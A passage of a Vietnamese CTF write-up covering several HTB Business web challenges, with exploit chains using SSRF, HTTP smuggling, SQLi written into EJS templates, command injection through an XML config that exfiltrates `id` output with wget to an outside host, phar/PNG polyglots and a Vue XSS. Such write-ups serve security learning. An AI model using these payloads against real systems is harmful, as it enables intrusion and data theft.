192.168.82.66 ở đây có vẻ chính là địa chị ip của phần backend xử lý được mở ở port 5000. Như đã phân tích từ đầu ta cần gọi các endpoint của Phần xử lý backend của NodeJS như /flushInterface để trigger RCE. Dó đó, ta có thể sử dụng ip này bypass qua blacklist check, thay vì sử dụng 192. ta hoàn toàn có thể sử dụng được 192- và điều này cũng được cho phép bởi nip.io dash notation: magic-127-0-0-1.nip.io

Như vậy ta đã bypass thành công được blacklist và trigger SSRF
Bypass proxy to get endpoint /flushInterface via HTTP Request Smuggling
Như đã phân tích từ đầu mục tiêu của chúng ta là get endpoint /flushInterface nhằm trigger RCE. Tuy nhiên do việc truy cập endpoint này đã bị proxy chặn từ trước đó
if strings.Contains(strings.ToLower(request.URL), string([]byte{102, 108, 117, 115, 104, 105, 110, 116, 101, 114, 102, 97, 99, 101})) {
    var responseText string = badReqResponse("Not Allowed")
    frontendConn.Write([]byte(responseText))
    frontendConn.Close()
    return
}

Ta vẫn chưa thể thành công thực thi được RCE mặc dù đã bypass được SSRF blacklisst check

Mục tiêu giờ đây chuyển hướng sang HTTP Request Smuggling. Tại sao lại là Request Smuggling thì cũng tại đoạn golang xử lý proxy mình tìm được một vài xử lý thú vi trong đoạn code đối với request
func requestParser(requestBytes []byte, remoteAddr string) (*HTTPRequest, error) {
    var requestLines []string = strings.Split(string(requestBytes), "\r\n")
    var bodySplit []string = strings.Split(string(requestBytes), "\r\n\r\n")

    if len(requestLines) < 1 {
        return nil, fmt.Errorf("invalid request format")
    }

    var requestLine []string = strings.Fields(requestLines[0])
    if len(requestLine) != 3 {
        return nil, fmt.Errorf("invalid request line")
    }

    var request *HTTPRequest = &HTTPRequest{
        RemoteAddr: remoteAddr,
        Method:     requestLine[0],
        URL:        requestLine[1],
        Protocol:   requestLine[2],
        Headers:    make(map[string]string),
    }

    for _, line := range requestLines[1:] {
        if line == "" {
            break
        }

        headerParts := strings.SplitN(line, ": ", 2)
        if len(headerParts) != 2 {
            continue
        }

        request.Headers[headerParts[0]] = headerParts[1]
    }

    if request.Method == HTTPMethods.POST {
        contentLength, contentLengthExists := request.Headers["Content-Length"]
        if !contentLengthExists {
            return nil, fmt.Errorf("unknown content length for body")
        }

        contentLengthInt, err := strconv.Atoi(contentLength)
        if err != nil {
            return nil, fmt.Errorf("invalid content length")
        }

        if len(bodySplit) <= 1 {
            return nil, fmt.Errorf("invalid content length")
        }
        var bodyContent string = bodySplit[1]
        if len(bodyContent) != contentLengthInt {
            return nil, fmt.Errorf("invalid content length")
        }

        request.Body = bodyContent[0:contentLengthInt]
        return request, nil
    }

    if len(bodySplit) > 1 && bodySplit[1] != "" {
        return nil, fmt.Errorf("can't include body for non-POST requests")
    }

    return request, nil
}

Tại đây, golang phân tích phần thân bằng cách chỉ cần tách request thành một mảng nơi có ký tự \r\n\r\n. Đối với một yêu cầu HTTP thông thường, điều này là hợp lý vì phần thân thường nằm sau \r\n\r\n. Tuy nhiên, ta có thể thấy một điều kì lạ là nếu ta tiếp sử dụng \r\n\r\n để gửi request thứ hai (smuggling) và bằng cách cố định việc truyền Content-Length: 1 và phần body với length tương đương, lúc này request parser sẽ coi phần thân lúc này chỉ là byte đầu với length là 1, điều này có nghĩa là khi checkMaliciousBody kiểm tra nó sẽ chỉ xem xét duy nhất byte này mà không tiến hành check requests thứ hai

Điều này xảy ra do việc sử dụng \r\n\r\n nhằm phân tách phần body và HTTP Header var bodySplit []string = strings.Split(string(requestBytes), "\r\n\r\n")
Ta có thể thấy mảng bodySplit được tạo ra thông qua việc tách chuỗi thành các chuỗi con dựa trên kí tự phân tách \r\n\r\n Tuy nhiên phần được coi là body chỉ là phần thứ hai var bodyContent string = bodySplit[1] và các phân tiếp sau không được xét đến. Khi đó golang chỉ coi a là body và check Content-Length có thỏa mãn hay không
var bodyContent string = bodySplit[1]
    if len(bodyContent) != contentLengthInt {
    return nil, fmt.Errorf("invalid content length")
}

Như mình đã phân tích ta có thể bypass qua điều này bằng cách thao túng Content-Length truyền vào. Lúc này checkMaliciousBody kiểm tra, nó chỉ coi a là body, lúc này là có thể bypass qua checkMaliciousBody bằng cách truyền phần body và Content-Length hợp lệ. Do chưa gặp kí tự kết thúc
if line == "" 
{
    break

Lúc này golang tiếp tục check requests thứ hai, tại đây ta có thể trigger RCE mà không bị loại bỏ bởi blacklist


Exploit Chain: DNS re-binding => HTTP smuggling on custom HTTP reverse-proxy => command injection on ip-wrapper library.


Flag
HTB{r3inv3nting_th3_wh331_c4n_cr34t3_h34dach35_bc1cd3704dc00e9a4e356dc60c4b8c7b}
Skills Learned
Sử dụng kỹ thuật DNS re-binding để bypass localhost checks.
Sử dung HTTP smuggling thông qua việc tận dụng lỗ hổng trong http parsers.
RCE bypass space
Blueprint Heist
credit: Trương Ngọc Lâm

Tiếp theo là một bài white-box với source nodejs+graphql+ejs template
Bài này chain khá nhiều vul cụ thể ta phải tận dụng 3 lỗi để RCE.
Reconnaissance + detect
Đặt bản thân với tư các người dùng thì mình sẽ test qua các chức năng chính của trang web.
Giao diện chỉ đơn giản như dưới đây:

Khi click vào 2 mục thì sẽ tải các file pdf từng phần liên quan của các mục về máy mình.
View nhanh qua các api được gọi:


Tiêu biểu ở đây nhất là api /download nhận param token và body là url đường dẫn trực tiếp-> nghi nghi ssrf ở đâu đây :/
Mình sẽ đi luôn vào source code để làm sáng tỏ những api trên.

Mục tiêu của bài này là đọc file flag nằm tại /root/flag -> có 2 cách để tiếp cận, 1 là đọc trực tiếp nó, 2 là run /readflag có chức năng đọc file trên.
//index.js
app.set("view engine", "ejs");
app.use('/static', express.static(path.join(__dirname, 'static')));

app.use(internalRoutes)
app.use(publicRoutes)

app.use((res, req, next) => {
  const err = generateError(404, "Not Found")
  return next(err);
});

app.use((err, req, res, next) => {
  renderError(err, req, res);
});

Có thể thấy web có 2 routes chính là publicRoutes và internalRoutes bên cạnh đó còn 1 middleware generateError để validate một vài lỗi trước khi renderError ở cuối.
Vì ứng dụng viết theo mô hình mvc nên mình sẽ phân thích theo tư duy này luôn
Đi thẳng vào 2 routes này:
publicRoutes
const { authMiddleware, generateGuestToken } = require("../controllers/authController")
const { convertPdf } = require("../controllers/downloadController")

router.get("/", (req, res) => {
    res.render("index");
})

router.get("/report/progress", (req, res) => {
    res.render("reports/progress-report")
})

router.get("/report/enviromental-impact", (req, res) => {
    res.render("reports/enviromental-report")
})

router.get("/getToken", (req, res, next) => {
    generateGuestToken(req, res, next)
});

router.post("/download", authMiddleware("guest"), (req, res, next) => {
    convertPdf(req, res, next)
})

Route này lại chứa 5 routes chính và ở đây có 2 routes quan trọng để khai thác:

/getToken endpoint để generate token cho guest và trả ra trực tiếp cho client. Sử dụng method generateGuestToken nằm trong authController với secret trong .env.

function generateGuestToken(req, res, next) {
    const payload = {
        role: 'user'
    };
    jwt.sign(payload, secret, (err, token) => {
        if (err) {
            next(generateError(500, "Failed to generate token."));;
        } else {
            res.send(token);
        }
    });
}


/dowload endpoint với method post có vẻ đây là api quan trọng mà ta tìm được ở trên thì tương tự nó dùng method convertPdf và cần phải có auth với guest được, nó sẽ lấy nội dung từ url của mình và lưu thành filepdf.

const { generateError } = require('./errorController');
const { isUrl } = require("../utils/security")
const crypto = require('crypto');
const wkhtmltopdf = require('wkhtmltopdf');

async function convertPdf(req, res, next) {
    try {
        const { url } = req.body;

        if (!isUrl(url)) {
            return next(generateError(400, "Invalid URL"));
        }

        const pdfPath = await generatePdf(url);
        res.sendFile(pdfPath, {root: "."});

    } catch (error) {
        return next(generateError(500, error.message));
    }
}

async function generatePdf(urls) {
    const pdfFilename = generateRandomFilename();
    const pdfPath = `uploads/${pdfFilename}`;

    try {
        await generatePdfFromUrl(urls, pdfPath);
        return pdfPath;
    } catch (error) {
        throw new Error(`Error generating PDF: ${error.stack}`);
    }
}

async function generatePdfFromUrl(url, pdfPath) {
    return new Promise((resolve, reject) => {
        wkhtmltopdf(url, { output: pdfPath }, (err) => {
            if (err) {
                console.log(err)
                reject(err);
            } else {
                resolve();
            }
        });
    });
}

function generateRandomFilename() {
    const randomString = crypto.randomBytes(16).toString('hex');
    return `${randomString}.pdf`;
}

module.exports = { convertPdf };

internalRoutes
const { authMiddleware } = require("../controllers/authController")

const schema = require("../schemas/schema");
const pool = require("../utils/database")
const { createHandler } = require("graphql-http/lib/use/express");


router.get("/admin", authMiddleware("admin"), (req, res) => {
    res.render("admin")
})

router.all("/graphql", authMiddleware("admin"), (req, res, next) => {
    createHandler({ schema, context: { pool } })(req, res, next); 
});

Routes này chứa 2 routes -> điểm mình sẽ tận dụng là /grapql nhưng routes này cần có auth admin và chấp nhận tất cả các method http.
const { GraphQLObjectType, GraphQLSchema, GraphQLString, GraphQLList } = require('graphql');
const UserType = require("../models/users")
const { detectSqli } = require("../utils/security")
const { generateError } = require('../controllers/errorController');

const RootQueryType = new GraphQLObjectType({
  name: 'Query',
  fields: {
    getAllData: {
      type: new GraphQLList(UserType),
      resolve: async(parent, args, { pool }) => {
        let data;
        const connection = await pool.getConnection();
        try {
            data = await connection.query("SELECT * FROM users").then(rows => rows[0]);
        } catch (error) {
            generateError(500, error)
        } finally {
            connection.release()
        }
        return data;
      }
    },
    getDataByName: {
      type: new GraphQLList(UserType),
      args: {
        name: { type: GraphQLString }
      },
      resolve: async(parent, args, { pool }) => {
        let data;
        const connection = await pool.getConnection();
        console.log(args.name)
        if (detectSqli(args.name)) {
          return generateError(400, "Username must only contain letters, numbers, and spaces.")
        }
        try {
            data = await connection.query(`SELECT * FROM users WHERE name like '%${args.name}%'`).then(rows => rows[0]);
        } catch (error) {
            return generateError(500, error)
        } finally {
            connection.release()
        }
        return data;
      }
    }
  }
});

const schema = new GraphQLSchema({
  query: RootQueryType
});

module.exports = schema;

Quan sát src trên ta có thể thấy có khả năng bị sqli ở trên khi truyền vào args->query nhưng có 1 waf:
function detectSqli (query) {
    const pattern = /^.*[!#$%^&*()\-_=+{}\[\]\\|;:'\",.<>\/?]/
    return pattern.test(query)
}

Vấn đề ở đây là bypass waf để SQLi.
RCE
Cùng để ý thì ở index.js có một routes xử lí ngoại lệ(error). Middleware sẽ check error và hiển thị với template ejs:
// index.js
function generateError(status, message) {
    const err = new Error(message);
    err.status = status;
    return err;
};

const renderError = (err, req, res) => {
    res.status(err.status);
    const templateDir = __dirname + '/../views/errors';
    const errorTemplate = (err.status >= 400 && err.status < 600) ? err.status : "error"
    let templatePath = path.join(templateDir, `${errorTemplate}.ejs`);

    if (!fs.existsSync(templatePath)) {
        templatePath = path.join(templateDir, `error.ejs`);
    }
    console.log(templatePath)
    res.render(templatePath, { error: err.message }, (renderErr, html) => {
        res.send(html);
    });
};

module.exports = { generateError, renderError }

Chú ý const errorTemplate = (err.status >= 400 && err.status < 600) ? err.status : "error" check status để chọn tên trang hiển thị lỗi.




Do đó ta sẽ ghi vào 1 file ejs để đọc flag hiển thị khi error vì page sẽ render theo tên status trước.
Exploit wkhtmltopdf SSRF
"wkhtmltopdf": "^0.4.0"
Searching thì khác nhanh tìm được vul và poc:

Khá giống với DNS binding thì mình sẽ redirect đến file:// tùy chỉnh trên hệ thống để wkhtmltopdf convert file đó sang dạng pdf và truy xuất nội dung.
Tạo server attack + public host with ngrok:

Thành công lấy được nội dung /etc/passwd


Leak secret_key jwt -> authenticate to admin user
Để truy cập được /graphql endpoint thì cần role của mình là admin cho nên ta phải control được jwt.
Chia sẻ 1 chút là ban đầu mình đọc:

Thấy secret nên mình nghĩ có thể leak được với weak secret nhưng mà không được mà quên mất là leak được .env với ssrf ở trên :> ( phản xạ quá chậm:(( )
Ok thì tương tự mình leak được /app/.env

secret=Str0ng_K3y_N0_l3ak_pl3ase?
Giả mạo token admin với secret_key ở trên:

Cũng có thể dùng 1 số tool để tạo

Dùng token này để access đến endpoint /graphql nhưng lưu ý là server check localhost
function checkInternal(req) {
    const address = req.socket.remoteAddress.replace(/^.*:/, '')
    return address === "127.0.0.1"
}

Do đó ta sẽ phải access thông qua bug ssrf ở trên.

Exploit Sqli bypass waf
Chức năng dành cho internal user để truy xuất ra cơ sở dữ liệu với param query.
Regex check ^.[!#$%^&()-_=+{}[]\|;:'",.<>/?].
Nhìn đến này thì ta nhớ đến bài ssti với ruby(ERB) trong HTB cũng có loại này và ta sẽ bypass với \n vì tất cả những kí tự ở dòng mới sẽ không bị test.




Thử dùng hàm loadfile trong mysql thì thành công leak được các file hệ thống nhưng có vẻ không có quyền root với user db.



Hook ở đây với bug tiếp theo là mình sẽ lợi dùng hàm writefile để ghi vào template ejs để exploit SSTI.
SSTI in ejs template via sqli
Nếu chỉ có bug SQLi thì khá khó để RCE được vì chắc chắn sẽ có hạn chế về quyền trên hệ thống nên mình sẽ khai thác thông qua chức năng hiển thị errorPage của trang web.


Sau vài lần tạo thì mình đã tạo mới file 404.ejs và ghi nội dung từ hook sqli ở trên

Payload: <%=7*7%>



Truy cập vào một endpoint không tồn tại để kích hoạt middleware hiển thị 404 Not Found và lúc này sẽ render tên file 404.ejs mà mình mới tạo và ghi vào.




Ngoài ra, còn 1 mẹo khá hay là bạn có thể nối chuỗi nó kiểu như này select 'l','a','m' into outfile thì ta nhận được chuỗi liền kề abc.
Exploit chain
Nói khá dài ở trên nên mình xin phép tóm lược lại flow của bài này.

Lợi dụng bug ssrf để đọc file /app/.env để lấy secret -> tạo token với role admin

Khai thác sqli ở /graphql để ghi vào một file 404.ejs notFound nhằm lợi dụng việc render template error của server.

Ghi vào file mới trong /app/views/errors/404.ejs với syntax ejs và RCE thành công.




secret=Str0ng_K3y_N0_l3ak_pl3ase?





Flag
HTB{ch41ning_m4st3rs_b4y0nd_1m4g1nary_fb9b1487d1761dfa224ee888e57fcefd}

Chắc sẽ có thắc mắc sao không được file/root/flag.txtluôn từ ssrf nhưng mà mình đã test thử không được có vẻ như là userdb không có quyền truy cập vào/rootthay vào đó thì user web lại có quyền này:

Magicom
credit: kev1n
Trong giải HTB Business này, mình tham gia vào làm challenge Omniwatch và Magicom cùng với các teammates trong câu lạc bộ. Chúng mình đã solve được challenge Omniwatch, còn Magicom thì gần như đã làm được, chỉ thiếu một bước nữa nhưng chúng mình đã đi sai hướng và không tìm ra cách giải kịp giờ nên không kịp solve.
Mình muốn viết là để chia sẻ lại quá trình giải challenge của mình và các teammates, và cũng như là hướng giải đúng đắn để solve challenge. Mình đã tham khảo official solution và nhận ra anh em đã đi đúng gần hết các bước, chỉ có bước đầu là chưa ra, nên bước đầu của mình sẽ đi theo con đường của official write up. Mình sẽ tiến hành vào khai thác tại local vì mình viết write up này hơi muộn nên không deploy trên server kịp=))
Preface
Challenge xuất hiện dưới dạng một website có chức năng xem sản phẩm và thêm sản phẩm, người dùng có thể thêm sản phẩm và một số các thông tin của sản phẩm, trong đó là phần ảnh minh họa:

Đã được add product tùy theo ý mình mà còn unauthen, mình ban đầu cũng nghĩ upload php để RCE:

Phân Tích Source Code
Config
Ngay sau khi mình mở source của challenge mình đã thấy đây chắc chắn không phải là một challenge upload file PHP thông thường. Vì challenge cung cấp cả phpinfo tại /info, và file php.ini, mình nhìn sơ qua qua thì cũng chưa có gì bất thường, nhưng chắc chắn là mình cần phải dùng đến chúng.
$router->get('/info', function(){
    return phpinfo();
});


Source Code
Challenge đã quy định những route có thể truy cập tại website trong index.php:
$router = new Router;

$router->get('/', 'HomeController@index');
$router->get('/home', 'HomeController@index');
$router->get('/product', 'ProductViewController@index');
$router->get('/addProduct', 'AddProductController@index');
$router->post('/addProduct', 'AddProductController@add');
$router->get('/info', function(){
    return phpinfo();
});

Mình ngay lập tức đi tìm kiếm những đoạn code xử lý upload file:

models/ImageModel.php

class ImageModel {
    public function __construct($file) {
        $this->file = $file;
    }

    public function isValid() {

        $allowed_extensions = ["jpeg", "jpg", "png"];
        $file_extension = pathinfo($this->file["name"], PATHINFO_EXTENSION);
        print_r($this->file);
        if (!in_array($file_extension, $allowed_extensions)) {
            return false;
        }

        $allowed_mime_types = ["image/jpeg", "image/jpg", "image/png"];
        $mime_type = mime_content_type($this->file['tmp_name']);
        if (!in_array($mime_type, $allowed_mime_types)) {
            return false;
        }

        if (!getimagesize($this->file['tmp_name'])) {
            return false;
        }

        return true;
    }
}


Class này được gọi trong request xử lý file nên mình muốn nói về nó trước. Quá trình kiểm duyệt file được gói gọn trong hàm isValid()

File extension được lấy bằng PATHINFO_EXTENSION và được whitelist => loại bỏ khả năng bypass upload file php bypass bằng extension file

Sử dụng print_r để in ra mảng thông tin của file đó theo dạng [key] => value

Sau khi check extension class tiếp tục check mime types bằng cách whitelist, và cuối cùng là check size bằng getimagesize. Mình gần như không thấy cơ hội nào để upload file PHP mà RCE được, nhưng đoạn print_r thông tin khá thú vị, vì nó chứa giá trị tmp_name


2. controllers/AddProductController.php
public function add() 
{
    if (empty($_FILES['image']) || empty($_POST['title']) || empty($_POST['description']))
    {
        header('Location: /addProduct?error=1&message=Fields can\'t be empty.');
        exit;
    }

    $title = $_POST["title"];
    $description = $_POST["description"];
    $image = new ImageModel($_FILES["image"]);

    if($image->isValid()) {

        $mimeType = mime_content_type($_FILES["image"]['tmp_name']);
        $extention = explode('/', $mimeType)[1];
        $randomName = bin2hex(random_bytes(8));
        $secureFilename = "$randomName.$extention";

        if(move_uploaded_file($_FILES["image"]["tmp_name"], "uploads/$secureFilename")) {
            $this->product->insert($title, $description, "uploads/$secureFilename");

            header('Location: /addProduct?error=0&message=Product added successfully.');
            exit;
        }
    } else {
        header('Location: /addProduct?error=1&message=Not a valid image.');
        exit;
    }
}


Nếu có dấu hiệu upload file, webserver đưa nó vào class ImageModel để sử dụng hàm isValid để check, nếu như return true thì lấy extension file bằng cách bổ đôi cái mime type mà lấy cái thứ 2 -> đoạn này khá lỏng lẻo vì giá trị đó mình control được nhưng đằng trước là whitelist nên đành chịu

Gắn file extension vừa lấy được với 16 ký tự random được gen bằng bin2hex(random_bytes(8)), move vào thư mục uploads và trả về thông báo và lỗi nếu có.


Riêng đoạn code check valid tại class ImageModel đã làm cho mình không tin tưởng vào việc có thể bypass upload file PHP nữa, mặc dù đoạn lấy extension ở controller khá ngon nhưng hàm valid lại quá chặt nên mình đi đọc những file khác vì còn rất nhiều thứ chưa được sử dụng.
Đáng chú ý nhất chắc chắn là file cli/cli.php, nó vốn được dùng để import file sql chứa các sản phẩm mặc định vào database bằng command line, sau đó file sql sẽ bị xóa:
php /www/cli/cli.php -c /www/cli/conf.xml -m import -f /www/products.sql
rm /www/products.sql

Vì pha import này quá cồng kềnh, chả có lí do gì phải làm hẳn 1 file php chỉ để import 1 file sql vào, nên mình chắc chắn sẽ khai thác từ file này ra:
Ngay từ đầu file đã đánh phủ đầu bằng việc check xem file có được thực thi thông qua dòng lệnh hay không:
if (!isset( $_SERVER['argv'], $_SERVER['argc'] ) || !$_SERVER['argc']) {
    die("This script must be run from the command line!");
}

argv và argc là 2 biến siêu toàn cục, trong đó argv sẽ là một mảng lưu giá trị của các tham số truyền được truyền vào file php dưới dạng mảng [số thứ tự] => value. Còn argc sẽ chứa số các tham số được truyền vào.
Ví dụ như với câu lệnh chạy file cli.php như ở trên, thì giá trị của argv sẽ có dạng như sau:
Array
(
    [0] => -c
    [1] => /www/cli/conf.xml
    [2] => -m
    [3] => import
    [4] => -f
    [5] => /www/products.sql
)

Còn argc sẽ mang giá trị là 6, ứng với số tham số truyền vào File có thể gồm 3 tham số truyền vào:
-c (--config): Truyền vào đường dẫn tuyệt đối đến file config ở định dạng xml
-m (--method): Tên phương thức hành động tương ứng, gồm có import, backup và healthcheck
-f (--filename): Sử dụng khi dùng method import, truyền vào tên file để import dữ liệu vào database

Tham số -c khá quan trọng, giá trị này sẽ được check xem có phải là thư mục hay không, nếu có sẽ chèn thêm config.xml trước rồi return đệ quy để tiếp tục kiểm tra, tiếp đó kiểm tra xem file có tồn tại, và file đó thêm .xml có tồn tại hay không, nếu 1 trong 2 tồn tại thì return về giá trị đó.
function isConfig($probableConfig) {
    if (!$probableConfig) {
        return null;
    }
    if (is_dir($probableConfig)) {
        return isConfig($probableConfig.\DIRECTORY_SEPARATOR.'config.xml');
    }

    if (file_exists($probableConfig)) {
        return $probableConfig;
    }
    if (file_exists($probableConfig.'.xml')) {
        return $probableConfig.'.xml';
    }
    return null;
};

Sau khi đã xác định file config có tồn tại, file mới được đưa vào xử lý:
function getConfig($name) {
    $configFilename = isConfig(getCommandLineValue("--config", "-c"));
    if ($configFilename) {
        $dbConfig = new DOMDocument();
        $dbConfig->load($configFilename);
        $var = new DOMXPath($dbConfig);
        foreach ($var->query('/config/db[@name="'.$name.'"]') as $var) {
            return $var->getAttribute('value');
        }
        return null;
    }
    return null;
}


Sử dụng DOMDocument() để load file config, sau đó query lấy giá trị từ thẻ gốc  -> , lấy attribute name lưu vào biến $vars và lấy attribute value của name tương ứng

Ta cũng có format của một file config sẽ như thế nào:



    "username" value="root"/>
    "password" value="root"/>
    "database" value=""/>


Hàm generateFilename dùng để tạo ra tên file ngẫu nhiên khi sử dụng method backup:
function generateFilename() {
    $timestamp = date("Ymd_His");
    $random = bin2hex(random_bytes(4));
    $filename = "backup_$timestamp" . "_$random.sql";
    return $filename;
}

\=> Kết quả cho ra file sql backup với filename sử dụng kết hợp ngày tháng và 8 ký tự random

Method backup

function backup($filename, $username, $password, $database) {
    $backupdir = "/tmp/backup/";
    passthruOrFail("mysqldump -u$username -p$password $database > $backupdir$filename");
}

Tại method này, server thực thi câu lệnh dump toàn bộ database vào file được quy định trước, với tên filename gen random; 3 giá trị username, password và database được lấy từ file config

Method import

function import($filename, $username, $password, $database) {
    passthruOrFail("mysql -u$username -p$password $database < $filename");
}

Tiếp tục sử dụng câu lệnh hệ thống đưa dữ liệu của filename được chỉ định vào database

Method healthcheck

function healthCheck() {
    $url = 'http://localhost:80/info';

    $headers = get_headers($url);

    $responseCode = intval(substr($headers[0], 9, 3));

    if ($responseCode === 200) {
        echo "[+] Daijobu\n";
    } else {
        echo "[-] Not Daijobu :(\n";
    }
}

Hàm truy cập đến path info dùng để hiển thị phpinfo() và lấy status code trả về thông qua header. Nếu 200 thì coi là ổn, khác thì bị coi là không ổn
\=> Method backup và import có khả năng command injection nếu như control được giá trị trong file config. Còn với option -f thì không chắc vì nó cũng bị kiểm tra bằng file_exists nên không thể command injection sau filename được.
Khai thác
Command Injection in cli.php
Mình mất một lúc để nhận ra có thể truy cập đến cli.php thông qua website /cli/cli.php. Nên mình đang nghĩ đến command injection vào các method, nhưng làm thế nào để bypass sử dụng trên command line?
Đang tìm cách thì teammates của mình phát hiện ra tại php.ini giá trị register_argc_argv đã bị comment: Giá trị này được mặc định là off, nếu như config này được kích hoạt thì mình hoàn toàn có thể truyền vào giá trị của 2 biến này thông qua dấu + thay vì dùng dấu & để ngăn cách.


Vậy thì mình có thể lợi dụng việc này để truyền giá trị vào các tham số -m và -c, thực thi file cli.php như đang ở command line, mình truy cập thử đến mode healthcheck thì thấy file hoàn toàn có thể thực thi được:

Mình quyết định sẽ lấy mode backup làm sink để RCE, với việc sử dụng DOMXPath query lấy dự liệu từ file xml, mình tạm thời bỏ qua việc upload file lên như nào mà craft một file xml để command injection vào username:
<config>
    <db name="username" value='|| wget --post-data "$(id)" -O- ut8mgeo8.requestrepo.com ||'/>
    <db name="password" value="root"/>
    <db name="database" value=""/>
config>

Để tránh câu lệnh bị thực thi khi echo vào thì mình base64 trước rồi truyền vào a.xml

Thử truyền vào method backup và tên file config là: /tmp/a.xml

Và mình thấy kết quả trả về requestrepo, đây là sink đúng để có thể RCE:

Oke vậy là đã có chỗ để RCE, vấn đề còn lại là upload file xml này lên như nào với cái rule
Race Condition??
Như mình đã nói ở trên, có 2 thứ mà mình thấy mình chưa sử dụng được trong challenge này, thứ nhất là trang phpinfo, và thứ 2 là cái print_r hiện thông tin của file. Khi PHP script nhận được một file request, file đó sẽ được lưu tạm thời trong thư mục /tmp và có thể tùy chỉnh trong php.ini. Trong trường hợp này sẽ là /tmp/php+6 ký tự [a-zA-Z0-9]. File trong thư mục tmp sẽ biến mất sau khi có sự xuất hiện của hàm move_uploaded_file hoặc khi PHP script đó kết thúc. Nghe ná ná giống với case LFI2RCE với phpinfo nên mình và teammate triển luôn theo hướng này. Bọn mình dự định sẽ upload file sau đó vào phpinfo để xem đường dẫn file tmp, rồi sử dụng mode backup để command injection. Nhưng sau khi thử rất nhiều lần không được, mình đã đi tìm hiểu kĩ hơn và nhận ra mình đã sai và chưa hiểu bản chất: Lỗi LFI2RCE với phpinfo xảy ra khi mình có thể upload file tại trang phpinfo luôn, tức là có thể sử dụng POST request. PHP sẽ lưu các file được upload lên thư mục temp đối với cả các PHP script không hề hỗ trợ xử lý file trong nó, còn ở đây mình chỉ có thể GET /info, nên cách này coi như tiêu tùng. Ref: http://dann.com.br/php-winning-the-race-condition-vs-temporary-file-upload-alternative-way-to-easy_php-n1ctf2018/ Không từ bỏ việc race, mình quyết định đánh vào khả năng print_r mảng về thông tin file khi upload file tại /addProduct, nhưng việc này cũng bất khả thi vì file đã được xử xong xuôi hết r mới có response trả về cho mình, mình đã tốn 2 ngày để thử theo phương pháp này và không thu được kết quả gì, vậy là challenge đã không thể solve kịp trước khi cuộc thi kết thúc :((
The right path: Phar Deserialization
Mình cứ mải đi race mà không nghĩ ra DOMDocument hỗ trợ cả file phar, tương tự như trong case XXE to Phar Deserialize khi DOMDocument->loadXML có thể truyền vào phar protocol thì ở đây, DOMDocument->load cũng có thể truyền vào phar protocol -> +1 kiến thức.
Thiên thời địa lợi nhân hòa, config phar.readonly cũng được tắt => có thể deser file phar:

Nếu như đã hỗ trợ deser phar file, thì mình chỉ cần để file xml của mình vào file phar và nhét vào 1 file ảnh valid là được. Về cách gen file phar như nào thì mình sẽ làm tương tự như chall upload phar file trong root me. Ref: https://thanhlocpanda.wordpress.com/2023/08/07/php-phar-jpeg-polyglot-javascript-jpeg-polyglot-root-me-part-ii/ (pass: thanhlocpanda)
Đường đi nước bước đã đủ, mình tổng hợp lại attack chain như sau:

Gen file ảnh càng ngắn càng tốt

Lấy hex của file đó, đắp vào file phar, chèn xml vào file phar và đổi extension về ảnh

Upload file ảnh, lấy đường dẫn ảnh

Gọi đến cli.php, sử dụng phar:// protocol gọi đến file xml nằm trong file phar => RCE


Final Exploit
Mình gen ảnh 1 pixel cho nó bé bằng đoạn code:
from PIL import Image

img = Image.new("RGB", (1,1), (255,255,255))
img.save("gen.png")

Mình lấy hex bằng cyberchef và được chuỗi:
\x89\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\x00\x00\x01\x00\x00\x00\x01\x08\x02\x00\x00\x00\x90\x77\x53\xde\x00\x00\x00\x0c\x49\x44\x41\x54\x78\x9c\x63\xf8\xff\xff\x3f\x00\x05\xfe\x02\xfe\x0d\xef\x46\xb8\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82

Đưa chuỗi vào scrip gen file phar, mình nhét file a.xml với payload đọc flag bằng /readflag vào trong file phar, rồi đổi tên file thành phar.png:

    $png = "\x89\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\x00\x00\x01\x00\x00\x00\x01\x08\x02\x00\x00\x00\x90\x77\x53\xde\x00\x00\x00\x0c\x49\x44\x41\x54\x78\x9c\x63\xf8\xff\xff\x3f\x00\x05\xfe\x02\xfe\x0d\xef\x46\xb8\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82";
    $xml_data = "";
    $phar = new Phar("phar.phar");
    $phar->startBuffering();
    $phar->addFromString("a.xml", $xml_data);
    $phar->setStub($png."__HALT_COMPILER(); ?>");
    $phar->stopBuffering();

    rename('phar.phar', 'phar.png');
?>

Upload file phar lên server thành công:

Vào list product để lấy tên ảnh, của mình là /uploads/3e10700de9433bdb.png
Request đến cli.php để lụm flag thôi:
GET /cli/cli.php?-m+backup+-c+phar:///www/uploads/3e10700de9433bdb.png/a.xml



SOS or SSO?
credit: Quyền
Bài này đội mình không solve được nên mình write up lại theo htb
Tổng quan
Trang web có backend golang với 2 tính năng chính:

Tạo note
  

Login
  

Flag được đặt ở note “My Secret” cần truy cập với adminId


Lỗ hổng

XSS via VueJS dynamic components
  Trong frontend/src/views/EditorView.vue chứa code rendering rich-text
    class="editor" v-if="note">
      <h1>{{ note.title }}h1>
      <div class="editor-text">
        <div>
          <component
            :is="item.type"
            v-bind="item.attr"
            v-for="(item, i) in noteContent"
            contenteditable="true"
            :ref="`item-${i}`"
            @focus="focused = i"
            @input="handleInput($event, i)"
            class="editor-element"
            >{{ noteContent[i].content }}component
          >
        div>
      div>

  noteContent array được duyệt dựa trên type key của mỗi object. V-bind được sử dụng để cung cấp các thuộc tính cho phần tử
  → Có thể khai thác lỗ hổng DOM XSS với item được lưu như sau:
  {"type": "img", "attr": {"src": "x", "onerror": "alert(quyendeptrai)"}}

  Thay đổi base64 được gửi khi lưu note và chèn payload để kích hoạt được XSS
  
  

XSS to IdP config submission
  XSS có thể được sử dụng để gửi cấu hình IdP do mình kiểm soát → Kiểm soát được luồng SSO khai thác SQLi để set role note vì flag được đặt trong secret note
  fetch(
      '/api/support/faction/1/config',
      {
          method: 'POST',
          headers: {
              'X-NOTES-CSRF-PROTECTION': '1'
          },
          body: JSON.stringify({clientId:'%s',clientSecret:'%s',endpoint:'%s'})
      }
  )

  
  Và code xử lý trong backend/edpoints/support.go!CreateOIDCConfig()

The SQLi
  Trong backend/auth/sso.go có đoạn code xử lý như sau
  
  Đoạn code xử lý yêu cầu thông tin người dùng từ IdP và sử dụng email được trả về để kiểm tra xem người dùng có bị cấm hay không, nếu không thì người dùng đã đăng ký hoặc đăng nhập
